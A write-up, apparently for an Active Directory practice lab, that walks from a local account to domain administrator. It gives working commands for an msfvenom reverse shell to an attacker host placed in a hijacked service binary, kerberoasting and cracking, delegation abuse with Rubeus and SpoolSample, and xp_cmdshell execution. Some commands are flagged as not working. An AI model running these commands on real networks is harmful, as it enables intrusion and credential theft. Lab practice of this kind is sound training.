Skip to content

Latest commit

 

History

History
108 lines (71 loc) · 3.63 KB

WRITEUP.md

File metadata and controls

108 lines (71 loc) · 3.63 KB
Raw

0. Starting Point

The context of this lab is that you are hired by a company in order to exploit any vulnerability there is on their Active Directory Infrastructure to become Domain Admin. To do so, the company has provided some local account credentials for the machine "Krillin".

You can use Remote Desktop to log in to the machine as .\auditor with the password "PassW0rd".

Furthermore, there is a folder C:\Tools with most of the tools you need to exploit any vulnerability there is on the lab.

1. Vulnerable service

  1. Enumerate vulnerable services
.\SharpUp.exe audit ModifiableServiceBinaries
  1. Because any local user has full control over the VulnService's folder and the service is stopped, it is possible to replace the file at C:\\Program Files\\Vulnerable Service\\ for the one created with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe-service -o Service.exe
  1. Then, restart the machine, and you should receive a reverse shell as capsulecorp\vuln_svc, granting access to the domain.
shutdown /r /t 0

2. Unconstrained delegation

As the user capsulecorp\vuln_svc perform the following steps.

  1. Check if there is any machine with unconstrained delegation.

The output should be the machine "RADITZ$".

Import-Module C:\Tools\PowerView.ps1
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
  1. In order to get access to the machine, we need to perform some kerberoasting.
Import-Module C:\Tools\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat  | % { $_.Hash } | Out-File -Encoding ASCII kerberoast_hashes.txt
  1. Crack the obtained tickets
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
  1. Now you can access the RADITZ machine through RDP to the machine.
  2. Obtain Goku's (DC) TGT using Rubeus. After executing the command, you will obtain the DC's TGT.
# In one terminal
.\Rubeus.exe monitor /interval:10 /nowrap

# In other terminal
.\SpoolSample.exe goku raditz


 # These COMMAND DO NOT WORK :/
 certutil.exe -urlcache -f http://raditz.capsulecorp.local
 Invoke-WebRequest http://raditz.capsulecorp.local -UseDefaultCredentials -UseBasicParsing

2. Constrained delegation

  1. The user capsulecorp\vuln_svc has access to a MSSQL instance. To check so, import PowerUpSQL and execute the following command.
Import-Module C:\Tools\PowerUpSQL.ps1
Get-SQLInstanceDomain
  1. Obtain code execution on the machine through MSSQL
Import-Module C:\Tools\PowerUpSQL.ps1
Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "select @@servername"
Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "EXEC master.dbo.xp_cmdshell 'whoami';"

# Enabling xp_cmdshell it is not necessary because it is already by default
# Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
  1. Once you have a proper reverse shell, extract the KRBTGT SQL_SVC ticket using Rubeus. To do so, you will have to upload/download the file into the machine.
.\Rubeus.exe  tgtdeleg /nowrap
  1. Impersonate the user
.\Rubeus.exe s4u  /impersonateuser:administrator /domain:capsulecorp.local /msdsspn:cifs/goku.capsulecorp.local /dc:goku.capsulecorp.local  /nowrap /ptt /ticket:<DUMPED_TICKET>
  1. Check that you have access to the sahre GOKU$\C$
dir \\goku.capsulecorp.local\c$